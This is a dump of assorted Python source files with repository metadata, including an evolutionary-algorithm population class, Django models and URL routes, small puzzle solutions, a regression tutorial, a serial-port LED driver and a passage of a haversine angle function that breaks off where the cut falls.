| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,637
|
py
|
import nsga_ii
from iga.gacommon import gaParams
import copy
class Population(nsga_ii.Population):
    """NSGA-II population specialized for interactive evolution (Python 2).

    Operator probabilities adapt to the operators present in user-selected
    individuals, and the user's favorite is preserved across generations.
    """
    def __init__(self, paramClass, paramDict):
        nsga_ii.Population.__init__(self, paramClass, paramDict)
        # Start every variation operator with a uniform probability.
        ops = gaParams.getVar('operators')
        len_ops = len(ops)
        op_prob = 1. / len_ops
        for i in xrange(len_ops):
            ops[i] = op_prob
        self.op_len = len(ops)
        print 'ops ', ops
    #---------------------------------------#
    def userInput(self, user_selection = []):
        '''
        Takes a list of the indices of the individuals selected
        by the user during evaluation, and we save the actual
        users on a list, to be used during fitness evaluation.
        It is the programmer's responsibility to decide on
        the meaning of the user feedback.
        '''
        # if feedback provided, otherwise the user selection was made
        # on the injected individuals
        if user_selection:
            user_selected = []
            ops = gaParams.getVar('operators')
            # NOTE(review): inc_prob/dec_prob are never used below (the 0.05
            # step is hard-coded), and '.05 / len(ops)-1' parses as
            # (.05 / len(ops)) - 1, not .05 / (len(ops) - 1) — confirm intent.
            inc_prob = .05
            dec_prob = .05 / len(ops)-1
            for i in user_selection:
                ind = self.subset[i]
                user_selected.append(ind)
                ind_ops = ind.operators
                # NOTE(review): this count() result is discarded — dead code?
                ind_ops.count(1)
                if ind_ops:
                    # Reward operators used by the chosen individual (cap at
                    # 0.9), penalize the rest (floor at 0.1).
                    for j in xrange(self.op_len):
                        if ind_ops[j]:
                            ops[j] = min(ops[j] + 0.05, 0.9)
                        else:
                            ops[j] = max(ops[j] - 0.05, 0.1)
            print 'ops ', ops
            self.user_selected = user_selected
    #---------------------------------------#
    def nextgen(self):
        '''
        Create next generation from current population.
        '''
        # Elitism: the first user-selected individual always survives.
        best = copy.deepcopy(self.user_selected[0])
        newPop = [best]
        random = self.params.random
        for i in xrange(0, self.popsize-1):
            p = self.pop[i]
            # Cross every individual with the user's favorite, then mutate.
            c1, c2 = self.crossover(p, best)
            self.params.mutate(c1)
            self.params.mutate(c2)
            newPop.extend([c1,c2])
        # evaluate children
        self.eval(newPop)
        new_fronts = self.createFronts(newPop)
        self.crowdedDistance(new_fronts)
        self.combinepop(new_fronts)
        # explicitly copy the user selected individual into
        # the next generation and set its rank to the highest
        randPos = random.randrange(0, self.popsize)
        self.pop[randPos] = copy.deepcopy(self.user_selected[0])
        self.pop[randPos].rank = 0
    #---------------------------------------#
|
[
"juan@dragonite.(none)"
] |
juan@dragonite.(none)
|
4608f91e2fdbac43339f6c6d31842b17ae0dafae
|
9607f45b501c62d0500536e14d134a1aca0a6982
|
/datum/utils/binary_utils.py
|
298f14ff5da4d3abe55ce11e5906ea9163bdccc3
|
[
"Apache-2.0"
] |
permissive
|
shashank-subex/datum
|
b8fb552d4180ea3ee6345fa6bf4a2620231c7601
|
089b687fc569c8c6ce613349297997c67ce40c7a
|
refs/heads/master
| 2023-05-28T01:00:04.701429
| 2021-06-10T11:13:38
| 2021-06-10T11:13:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,437
|
py
|
# Copyright 2020 The OpenAGI Datum Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Tuple
import tensorflow as tf
def is_binary_image(string: tf.Tensor) -> Tuple[bool, str]:
  """Determine image compression type using a binary string tensor/object.

  The first bytes of the buffer are compared against the magic numbers of
  the JPEG, PNG and BMP formats.

  Args:
    string: binary string, can be `tf.Tensor` or python bytes.

  Returns:
    a tuple containing a flag denoting whether input string is an image and
    the corresponding extension (if its an image, else empty).

  Raises:
    ValueError: if the input is neither `bytes` nor a `tf.Tensor`.
  """
  if not isinstance(string, (bytes, tf.Tensor)):
    raise ValueError(f'Input {string} is not a bytes string or `tf.Tensor`.')
  if isinstance(string, tf.Tensor):
    string = string.numpy()
  if string.startswith(b'\xff\xd8\xff'):
    return True, 'jpg'
  elif string.startswith(b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a'):
    return True, 'png'
  # Bug fix: the BMP magic number is the ASCII bytes 'BM' (0x42 0x4D); the
  # original compared against lowercase b'bm', which never matches a real
  # BMP file. Lowercase is kept for backward compatibility.
  elif string.startswith((b'BM', b'bm')):
    return True, 'bmp'
  else:
    return False, ''
|
[
"mrinal.haloi11@gmail.com"
] |
mrinal.haloi11@gmail.com
|
62cdd2136986368bbf1b0b11e0bd9c2b67467903
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/ysgbRFTPujx8v37yF_9.py
|
6636e68c4e204f96c2ae4dff5513f35eb4a94f15
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
class Triangle:
    """Incrementally built Floyd-style triangle.

    Row ``r`` holds ``r`` consecutive integers, continuing from where the
    previous row stopped (row 1 is ``[1]``, row 2 is ``[2, 3]``, ...).
    Rows are cached in ``self.r`` keyed by row number.
    """

    def __init__(self):
        # Start with just the first row; everything else is built on demand.
        self.r = {1: [1]}
        self.last_row = 1
        self.last_num = 1

    def advance(self):
        """Generate and cache the next row; always returns True."""
        width = self.last_row + 1
        start = self.last_num + 1
        fresh = list(range(start, start + width))
        self.last_num = fresh[-1]
        self.last_row = width
        self.r[width] = fresh
        return True

    def advance_to_row(self, row_goal):
        """Grow the triangle until it contains row ``row_goal``."""
        while self.last_row < row_goal:
            self.advance()
        return True

    def advance_to_num(self, num_goal):
        """Grow the triangle until it contains the number ``num_goal``."""
        while self.last_num < num_goal:
            self.advance()
        return True

    def search_by_row(self, row):
        """Return the cached row ``row`` (KeyError if not yet generated)."""
        return self.r[row]

    def search_by_num(self, num):
        """Return the row containing ``num`` (IndexError if not generated)."""
        hits = [k for k in self.r.keys() if num in self.r[k]]
        return self.r[hits[0]]
# Module-level triangle pre-expanded to 1000 rows so row_sum() is a cheap lookup.
t = Triangle()
t.advance_to_row(1000)

def row_sum(n):
    """Return the sum of the numbers in row `n` of the pre-built triangle."""
    return sum(t.search_by_row(n))
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
957e5920703f3c85f244e9d1b7a3969fb8b9b5b2
|
b3586235dc1e1acbd49fab996f581269a808480b
|
/sistema/producao/migrations/0102_bobine_diam.py
|
b042cee2ccaad255cc483cecad77993e16a08807
|
[] |
no_license
|
gonfersilva/Sistema
|
37ad1cd03dfbb7889fa0b0367c6ebd9044712ae3
|
4c6d9ade22040972efbe892eae0130939d7b5c46
|
refs/heads/master
| 2021-10-23T23:21:51.262723
| 2021-10-13T19:45:49
| 2021-10-13T19:45:49
| 155,545,680
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 452
|
py
|
# Generated by Django 2.2.7 on 2020-06-16 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the nullable decimal field `diam` (diameter) to the `bobine` model."""

    dependencies = [
        ('producao', '0101_auto_20200616_1506'),
    ]

    operations = [
        migrations.AddField(
            model_name='bobine',
            name='diam',
            # 10 digits / 2 decimal places; nullable+blank so existing rows
            # require no value on upgrade.
            field=models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True, verbose_name='Diametro'),
        ),
    ]
|
[
"goncalo.silva@elastictek.com"
] |
goncalo.silva@elastictek.com
|
0d0efe5aebd2fc8deddd6b033513330081a63629
|
72cdc45a345fe47c525468ff82ef8ce845d9f800
|
/Python/django_ajax/ajax_post/app/models.py
|
db2ea4bd5133f6de68fbf6b39f46e364a5fbe072
|
[] |
no_license
|
bopopescu/Coding-Dojo-assignments
|
474242e14371e729b5948602ffc0a9328f1e43cb
|
0598d7162b37d9472c6f1b82acc51d625ac871ca
|
refs/heads/master
| 2022-11-23T18:55:36.393073
| 2018-07-20T07:43:56
| 2018-07-20T07:43:56
| 281,670,452
| 0
| 0
| null | 2020-07-22T12:24:30
| 2020-07-22T12:24:30
| null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
from django.db import models
# Create your models here.
class NoteManager(models.Manager):
    """Custom manager exposing the two queries the views need."""
    # Create a Note from raw POST data (expects a 'note' key).
    def create_note(self,post_data): self.create(note=post_data['note'])
    # All notes, newest first.
    def notes_rev(self): return self.all().order_by('-id')
class Note(models.Model):
    """A single free-text note with creation/update timestamps."""
    note = models.TextField()
    # NOTE(review): field is named `create_at` (not the conventional
    # `created_at`); renaming would require a migration.
    create_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    # NOTE(review): manager is bound as `obj`, not Django's conventional
    # `objects`; callers must use Note.obj.
    obj = NoteManager()
|
[
"gringojaimes20@gmail.com"
] |
gringojaimes20@gmail.com
|
037fc634a6c96cca0b1264ed15b267b1d4a37fa3
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_116/2243.py
|
3f2ecb9e374f1d2bd6ced2658ba82fc35ee1861b
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,156
|
py
|
# 0123
# 0 ....
# 1 ....
# 2 ....
# 3 ....
class Game:
    """State tracker for one board of the Code Jam Tic-Tac-Toe-Tomek problem.

    The board is fed one row at a time. Row wins are counted incrementally;
    columns and diagonals are tracked as per-symbol "still fully owned"
    flags that get discarded as soon as a disproving cell is seen.
    Python 2 module (print statements).
    """
    def __init__(self, size = 4):
        # NOTE(review): `size` parameterizes the column flags below, but
        # self.size is hard-coded to 4 -- confirm before reusing with
        # other board sizes.
        self.size = 4
        self.rows = { 'X': 0, 'O': 0 }
        self.columns = {}
        self.columns['X'] = [True] * size
        self.columns['O'] = [True] * size
        self.diagonals = {'X': [True, True], 'O': [True, True]}
        self.empty = 0
        # Final outcome: 'X'/'O' (winner), 'D' (draw), 'N' (not completed).
        self.result = None
    def add_empty(self):
        # Count an unfilled '.' cell; any empty cell means the game may be unfinished.
        self.empty += 1
    def add_to_row(self, symbol):
        # One more current-row cell counts toward `symbol` ('T' counts for both).
        self.rows[symbol] += 1
    def discard_diagonal(self, symbol, i, j):
        # Rule out the main diagonal (i == j) and/or the anti-diagonal
        # (i + j == size - 1) for `symbol`.
        if i == j:
            self.diagonals[symbol][0] = False
        if (self.size - i - 1) == j:
            self.diagonals[symbol][1] = False
    def discard_column(self, symbol, column):
        self.columns[symbol][column] = False
    def discard_row(self, symbol):
        self.rows[symbol] = 0
    def check_and_clean_rows(self):
        # Called after each complete row: a count equal to `size` is a row win.
        # Counters are reset for the next row either way.
        for symbol in self.rows.keys():
            if self.rows[symbol] == self.size:
                self.result = symbol
            self.rows[symbol] = 0
    def game_over(self):
        # Decide the final result once all rows have been consumed.
        if not self.result:
            for symbol in self.columns.keys():
                if any(self.columns[symbol]):
                    self.result = symbol
                    break
            # NOTE(review): the diagonal scan can overwrite a column winner
            # found just above -- verify both can't belong to different
            # players on a legal board.
            for symbol in self.diagonals.keys():
                if any(self.diagonals[symbol]):
                    self.result = symbol
                    break
        if not self.result:
            if self.empty:
                self.result = 'N'
            else:
                self.result = 'D'
    def print_result(self, game_count):
        # Emit the judge-expected output line for this case (Python 2 print).
        if self.result in ('X', 'O'):
            print "Case #%i: %s won" % (game_count, self.result)
        elif self.result == 'D':
            print "Case #%i: Draw" % (game_count)
        elif self.result == 'N':
            print "Case #%i: Game has not completed" % (game_count)
def get_stats(input):
    """Read T boards from `input` (file-like) and print one verdict per board.

    Input format: first line is the number of cases; each case is `size`
    board rows followed by a blank separator line.
    """
    n = int(input.readline().strip())
    # NOTE(review): `counts` is never used -- dead variable.
    counts = {}
    # Map each player to the opponent whose lines a cell disproves.
    other = { 'X': 'O', 'O': 'X' }
    g = Game()
    game_count = 1
    i = 0  # column index within the current row
    j = 0  # row index within the current board
    while game_count <= n:
        line = input.readline().strip()
        i = 0
        for cell in line:
            if cell == 'T':
                # 'T' is wild: counts toward both players' rows.
                g.add_to_row('X')
                g.add_to_row('O')
            elif cell == '.':
                # An empty cell disproves this column and any diagonal
                # through it for both players, and flags an unfinished game.
                g.discard_column('X', i)
                g.discard_column('O', i)
                g.discard_diagonal('X', i, j)
                g.discard_diagonal('O', i, j)
                g.add_empty()
            elif cell in ('X', 'O'):
                # A player's mark disproves the opponent's row, column and
                # diagonals through this cell.
                g.add_to_row(cell)
                g.discard_row(other[cell])
                g.discard_column(other[cell], i)
                g.discard_diagonal(other[cell], i, j)
            i += 1
        g.check_and_clean_rows()
        j += 1
        if j >= g.size:
            # Board complete: settle the verdict, print it, skip the
            # blank separator line(s), and reset for the next case.
            g.game_over()
            if g.result:
                g.print_result(game_count)
            if i == 0: input.readline()
            while input.readline().strip(): pass
            g = Game()
            game_count += 1
            i = 0
            j = 0
# Read the problem input from stdin when run as a script.
if __name__ == '__main__':
    import sys
    get_stats(sys.stdin)
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
1fa634ea7182b12e6ce9021f8050dcc3492d90b5
|
fe3ecb9b1ddd8de17b8cc93209134f86cd9c4a6f
|
/4_Python_ML/chap06_Regression/lecture/step01_regression.py
|
9dd4e34d1e6a6aed096bba40c35b13ede650b6d2
|
[] |
no_license
|
nsh92/Bigdata-and-Machine-Learning-Education-at-ITWILL
|
d1a7292ee4865a3d0c664dd6ecf3afc0d6325847
|
3cb5661001597499178a2c85f4ccf70dcf0855d6
|
refs/heads/master
| 2022-11-21T23:10:51.421708
| 2020-07-23T12:49:11
| 2020-07-23T12:49:11
| 275,540,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,471
|
py
|
# -*- coding: utf-8 -*-
"""
Regression-equation refresher on the Galton height data:
    slope     = Cov(x, y) / Sxx   (Sxx = mean squared deviation of x)
    intercept = y_mean - slope * x_mean
"""
from scipy import stats  # regression model
import pandas as pd
import numpy as np  # bug fix: np.mean() was used below without this import

galton = pd.read_csv('C:/ITWILL/4_Python-II/data/galton.csv')
galton.info()
'''
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 928 entries, 0 to 927
Data columns (total 2 columns):
 #   Column  Non-Null Count  Dtype
---  ------  --------------  -----
 0   child   928 non-null    float64
 1   parent  928 non-null    float64
'''

# Effect of parent height (X) on child height (Y)
x = galton['parent']
y = galton['child']

model = stats.linregress(x, y)
# slope=0.6462905819936423, intercept=23.941530180412748,
# rvalue=0.4587623682928238, pvalue=1.7325092920142867e-49, stderr=0.04113588223793335
# rvalue: parent height alone does not fully determine child height

# Y = x*a + b
y_pred = x*model.slope + model.intercept
y_pred

y_true = y

# predictions vs observations
y_pred.mean()
y_true.mean()  # compare means first: very similar

# slope computed by hand
xu = x.mean()
yu = y.mean()
Cov_xy = sum((x-xu) * (y-yu)) / len(x)
Sxx = np.mean((x-xu)**2)
slope = Cov_xy / Sxx  # 0.6462905819936413

# intercept computed by hand
incept = yu - (slope * xu)  # 23.94153018041171

# goodness of fit: rvalue
galton.corr()  # 0.458762 : this is simply the rvalue

y_pred = x * slope + incept
y_pred.mean()  # 68.08846982758423
|
[
"totols1092@gmail.com"
] |
totols1092@gmail.com
|
48421324896cdf92d22394ec3216d8ebde4bb512
|
cbedb18df0aaac810aeea87a2273edb15c1cf899
|
/Strings/49. Group Anagrams(3).py
|
376bd9d635f4dd8b8830d8cec0f586ee7d9eeefc
|
[] |
no_license
|
kanglicheng/CodeBreakersCode
|
71b833bb9f4c96d520c26f0044365dc62137a940
|
31f7f730227a0e10951e7468bad1b995cf2eafcb
|
refs/heads/master
| 2023-08-07T20:32:05.267695
| 2020-09-14T14:36:25
| 2020-09-14T14:36:25
| 265,978,034
| 0
| 0
| null | 2020-05-22T00:05:29
| 2020-05-22T00:05:29
| null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
# not sure about the solution at start
# sort each str => O(W logW), w is the length of each words -> O(N * W log W) or counting sort O(N*W)
# turn each word into count char list: each list length is fixed:26 -> need O(W) to turn to list
# but lst can't hash -> turn to str then use hash map
class Solution:
    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
        """Group the words in `strs` that are anagrams of each other.

        Each word is reduced to a 26-slot character-count signature
        ("c0|c1|...|c25|"); words sharing a signature are anagrams.
        Runs in O(N * W) for N words of length W (no sorting of words).
        """
        def signature(word):
            # Per-letter counts, rendered as a '|'-separated hashable string.
            counts = [0] * 26
            for ch in word:
                counts[ord(ch) - ord('a')] += 1
            return "".join(str(c) + "|" for c in counts)

        buckets = {}
        for word in strs:
            buckets.setdefault(signature(word), []).append(word)
        return list(buckets.values())
|
[
"56766457+Wei-LiHuang@users.noreply.github.com"
] |
56766457+Wei-LiHuang@users.noreply.github.com
|
706004ded5504282ced7c31b8a3c251769a0d8c8
|
b00330d48bfe09da78e50694a72793fe128c6a01
|
/27_머신러닝_붓꽃 품종 학습.py
|
e10c7892374db24c3f940ab357d31d34b02b1683
|
[] |
no_license
|
swj8905/2021_Hongik_Summer
|
c177d64c6f0326f00d974e20e1334d8ac0ede3e4
|
e3c28d1bfeb4d6a55b152bd922b61b77a17bb84c
|
refs/heads/master
| 2023-06-16T00:47:15.852607
| 2021-07-08T12:01:31
| 2021-07-08T12:01:31
| 378,916,618
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
from sklearn.svm import SVC
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

# Load the data
df = pd.read_csv("./iris.csv")
label = df["variety"]
data = df[["sepal.length", "sepal.width", "petal.length", "petal.width"]]
train_data, valid_data, train_label, valid_label = train_test_split(data, label)

# Train the model
model = SVC() # Support Vector Machine Classifier
model.fit(train_data, train_label)

# Predict on the held-out split
result = model.predict(valid_data)

# Measure accuracy against the held-out labels
score = accuracy_score(result, valid_label)
print(score)
|
[
"swj8905@naver.com"
] |
swj8905@naver.com
|
3beaca888a36dc002b9fa618283aacf86d72d4a1
|
e7b20ed87e8402bb8f55f0bf2b91824c264e07b4
|
/pyhypnolsd/hypnolsd.py
|
76420c7b4a25359320b46780ee95a1c1dcd98b44
|
[
"Unlicense"
] |
permissive
|
rclough/pyHypnoLSD
|
1ebe10929e6067e219851239f6e5a27fafcdb4b4
|
6d8c0539633d47c7e59368fcc849ca9b79ac6db4
|
refs/heads/master
| 2016-09-05T16:51:15.803912
| 2014-02-14T21:27:58
| 2014-02-14T21:27:58
| 16,823,888
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,016
|
py
|
"""
Module that contains various functions, constants, and tools
for interacting with a hypnoLSD object
"""
import sys, serial
###############################################################################
# Constants
###############################################################################
###############################################################################
# Constants
###############################################################################
NATIVE_BAUD = 9600
MAX_BAUD = 12000000
COMMAND_MODE = 0
DRAW_MODE = 1
READLINE_TIMEOUT = 0.5
# NOTE(review): this is the four ASCII characters "0xFE", not the single
# byte 0xFE -- confirm against the HypnoLSD sync-byte protocol.
SYNC_BYTE = b'0xFE'

###############################################################################
# Utility methods
###############################################################################
def baud_from_divisor(divisor):
    """
    Return the baud rate produced by a given HypnoLSD divisor.

    Parameters
    ----------
    divisor : int
        Baud-rate divisor; the device runs at MAX_BAUD / (divisor + 1).
        See the HypnoLSD docs for details.
    """
    steps = int(divisor) + 1
    return MAX_BAUD / steps

def divisor_from_baud(baud) :
    """
    Return the divisor needed for a desired baud rate. ints only please.

    Parameters
    ----------
    baud : int
        Target baud rate to derive the HypnoLSD divisor for.
    """
    return int(MAX_BAUD / int(baud)) - 1
###############################################################################
# HypnoLSD class
###############################################################################
class HypnoLSD:
    """
    Class meant to symbolize a single HypnoLSD module. Tracks the state
    of the module so that it may be used by different convenience interfaces,
    or used directly.

    By default, demo is turned off because it is useless when programming.
    Python 2 module (print statements, implicit str/bytes mixing).
    """
    def __init__(self, port, baudrate=NATIVE_BAUD):
        # Initialize internal variables
        self.mode = COMMAND_MODE
        # Initialize serial connection; the close/open cycle resets a port
        # that a previous session may have left open.
        self.serial = serial.Serial(port=port, baudrate=NATIVE_BAUD, timeout=READLINE_TIMEOUT)
        self.serial.close()
        self.serial.open()
        # Turn off demo mode
        self.demo_off()
        # Update baud rate if necessary (device always boots at NATIVE_BAUD)
        if baudrate != NATIVE_BAUD:
            self.change_baudrate(baudrate)

    def change_baudrate(self, baudrate):
        """ Change the baud rate used to speak to HypnoLSD """
        if baudrate == self.serial.baudrate:
            return ["Baudrate already set to " + str(baudrate)]
        divisor = divisor_from_baud(baudrate)
        return self.change_divisor(divisor, baudrate)

    def change_divisor(self, divisor, baudrate=False):
        """ Change the baud rate divisor on the HypnoLSD """
        if not baudrate:
            baudrate = baud_from_divisor(divisor)
        if baudrate == self.serial.baudrate:
            return ["Baudrate already set to " + str(baudrate)]
        # Send command, then flush before switching our own port speed so the
        # command leaves the wire at the old rate.
        response = self.send_command("set speed " + str(divisor))
        self.serial.flush() # Flush command so we can read output with new baud rate
        self.serial.baudrate = baudrate
        return response

    def send_command(self, command, override=False, print_it=False):
        """
        Send a command to HypnoLSD, only available in Command Mode

        Parameters
        ----------
        command : string
            Command to send to HypnoLSD, with no return chars
        override : boolean (optional)
            Set true if you want to switch modes (if currently in draw mode)
            so you can send the command.
        print_it : boolean (optional)
            Set true to echo the device's response to stdout.

        Returns the device response as a list of stripped lines (or None if
        refused because the module is in draw mode without override).
        """
        # Check modes
        if self.mode == DRAW_MODE and not override:
            print "Currently in Draw Mode, cannot execute commands"
            return
        elif self.mode == DRAW_MODE and override:
            # NOTE(review): this calls draw_mode() while already in draw
            # mode (a no-op); presumably command_mode() was intended --
            # confirm against the device protocol.
            self.draw_mode()
        # Execute command
        self.serial.write(command+"\r\n")
        return self.get_response(print_it)

    def get_response(self, print_it=False, break_on_OK=True):
        """
        Get one HypnoLSD response, a list of lines.

        Parameters
        ----------
        print_it : boolean (optional)
            Print the output to stdout
        break_on_OK : boolean (optional)
            If set true, it will only print up to the last "OK".
            This can speed up program flow if you are retrieving responses
            for each command you send. When set to false, it will spit out
            everything available for it to spit out.
        """
        response = []
        has_serial = True
        while has_serial:
            # Keep reading lines from serial until you timeout
            from_serial = self.serial.readline()
            if not from_serial:
                has_serial = False
            else:
                response.append(from_serial.strip())
                if print_it:
                    sys.stdout.write(from_serial)
                # Compare the *unstripped* line so the terminator is exact.
                if break_on_OK and from_serial == "OK\r\n":
                    break
        if print_it:
            sys.stdout.flush()
        return response

    def command_mode(self):
        """ Put HypnoLSD in Command Mode """
        # NOTE(review): SYNC_BYTE is the literal b'0xFE' (four ASCII chars),
        # so this writes 8 bytes, not two 0xFE bytes -- verify against the
        # HypnoLSD sync protocol.
        self.serial.write(SYNC_BYTE+SYNC_BYTE)
        self.mode = COMMAND_MODE

    def draw_mode(self):
        """ Put HypnoLSD in Draw Mode """
        if self.mode == DRAW_MODE:
            return
        self.send_command("draw")
        self.mode = DRAW_MODE

    def demo_off(self):
        """ Turn off demo mode. Useless when coding. """
        self.send_command("demodelay 0")
        self.get_response(break_on_OK=False) # swallow response

    def close(self):
        """ Close connection to HypnoLSD """
        # Restore the boot-time baud rate so the next session can connect.
        self.change_baudrate(NATIVE_BAUD)
        self.serial.close()

    def flush(self):
        """ Flush inputs and outputs of device """
        self.serial.flush()
|
[
"root@beaglebone.(none)"
] |
root@beaglebone.(none)
|
40b38c9d62305e2dc9eb496685175c25a2a73a41
|
21dd7d56c370ea9a02b66654525fd96a398a9e49
|
/apps/competition/urls.py
|
8fda71942b35148c142e463894bd46fdd17e9acf
|
[] |
no_license
|
hqpr/fame
|
fdad5d03bf9ee7ca31ae8a4701ff05bafd49540f
|
8b77e3a822ae70ee6d79a8003e1d9f9bc5ba8355
|
refs/heads/master
| 2023-01-14T16:58:46.533090
| 2015-08-31T15:37:09
| 2015-08-31T15:37:09
| 35,205,330
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
from django.conf.urls import url
from apps.competition.views import competitions, single_competition, single_competition_terms, pick_media_file, SingleCompetitionEnter, \
competition_add_audio, competition_add_video, entry_review
# Competition URL routes: listing, per-competition subpages (overview, chart,
# terms, entry flow) and media-attachment endpoints.
urlpatterns = [
    url(r'^$', competitions, name='all_competitions'),
    url(r'^(?P<slug>[\w\-]+)/$', single_competition, {"display": "overview"}, name='single_competition'),
    url(r'^(?P<slug>[\w\-]+)/chart/$', single_competition, {"display": "chart"}, name='single_competition_chart'),
    url(r'^(?P<slug>[\w\-]+)/entry/(?P<entry_slug>[\w\-]+)$', single_competition, {"display": "chart"}, name='single_competition_entry'),
    url(r'^(?P<slug>[\w\-]+)/terms/$', single_competition_terms, {"display": "terms"}, name='single_competition_terms'),
    url(r'^(?P<slug>[\w\-]+)/enter/$', SingleCompetitionEnter.as_view(), name='single_competition_enter'),
    url(r'^(?P<slug>[\w\-]+)/pick/$', pick_media_file, name='pick_media_file'),
    # Attach media to a competition entry by object id.
    url(r'^add/(?P<object_id>\d+)/$', competition_add_audio, name='competition_add_audio'),
    url(r'^add/video/(?P<object_id>\d+)/$', competition_add_video, name='competition_add_video'),
    url(r'^(?P<slug>[\w\-]+)/review/$', entry_review, name='entry_review'),
]
|
[
"adubnyak@gmail.com"
] |
adubnyak@gmail.com
|
5181e499b3220d7aa79460e74c4d532b634fb8bc
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/QgAwpaFWD2jtxZ2wG_8.py
|
c19c34476af79ec15c2595c52b9b91290b20f82c
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
"""
Given an integer `n`. Your task is to find how many digits this integer
contains without using `str` or `len` methods!
### Examples
sum_digits(100) ➞ 3
sum_digits(1000) ➞ 4
sum_digits(1) ➞ 1
### Notes
N/A
"""
def sum_digits(n):
    """Return how many decimal digits the integer `n` contains,
    without using `str` or `len`.

    Examples: sum_digits(100) -> 3, sum_digits(0) -> 1, sum_digits(1) -> 1.
    """
    # Bug fix: work on the absolute value. For negative n the original loop
    # never terminated, because floor division drives n to -1 and -1 // 10
    # stays -1 forever.
    n = abs(n)
    if n == 0:
        return 1
    count = 0
    while n != 0:
        n //= 10
        count += 1
    return count
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f5ef2c723c317a80eb8cad3ed47da968f1411d5f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_inferiors.py
|
acab87363dd1d78f2b03e3b0fd1313fda1eeab3e
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
py
|
from xai.brain.wordbase.adjectives._inferior import _INFERIOR
#class header
class _INFERIORS(_INFERIOR, ):
    """Word-base entry for the plural adjective "INFERIORS".

    Thin subclass of _INFERIOR that only overrides identifying metadata
    (display name, word class, and base form).
    """
    def __init__(self,):
        _INFERIOR.__init__(self)
        self.name = "INFERIORS"
        self.specie = 'adjectives'
        self.basic = "inferior"
        self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
d812823dcc5f741c075b136a22be8928175d68e6
|
5388e00d992050d515f72666e2f76c51b2ca56ee
|
/calc_angle_between_two_locs.py
|
424c037ae9233d5870ce13b03f901b6b13ad4281
|
[
"Apache-2.0"
] |
permissive
|
lonecrane/PyGuymer3
|
df9ffc62d4f7fddf04ae3ea18f5487dec48472c7
|
c7eb017dac18abb5eafe74e23a93bf7e68e48916
|
refs/heads/master
| 2020-09-11T23:44:14.036051
| 2019-11-20T07:01:22
| 2019-11-20T07:01:22
| 222,229,475
| 0
| 0
|
Apache-2.0
| 2019-11-17T10:13:51
| 2019-11-17T10:13:51
| null |
UTF-8
|
Python
| false
| false
| 1,049
|
py
|
def calc_angle_between_two_locs(lon1_deg, lat1_deg, lon2_deg, lat2_deg):
    """
    Given two coordinates (in degrees) on the surface of a sphere, return
    the central angle (in degrees) between them, using the haversine form
    which is numerically stable for small separations.
    """
    # Import modules ...
    import math

    # Convert all four inputs to radians ...
    lon1, lat1, lon2, lat2 = (
        math.radians(v) for v in (lon1_deg, lat1_deg, lon2_deg, lat2_deg)
    )

    # Haversine: half-chord length between the two points on the unit sphere.
    half_chord = math.hypot(
        math.sin((lat1 - lat2) / 2.0),
        math.cos(lat1) * math.cos(lat2) * math.sin((lon1 - lon2) / 2.0),
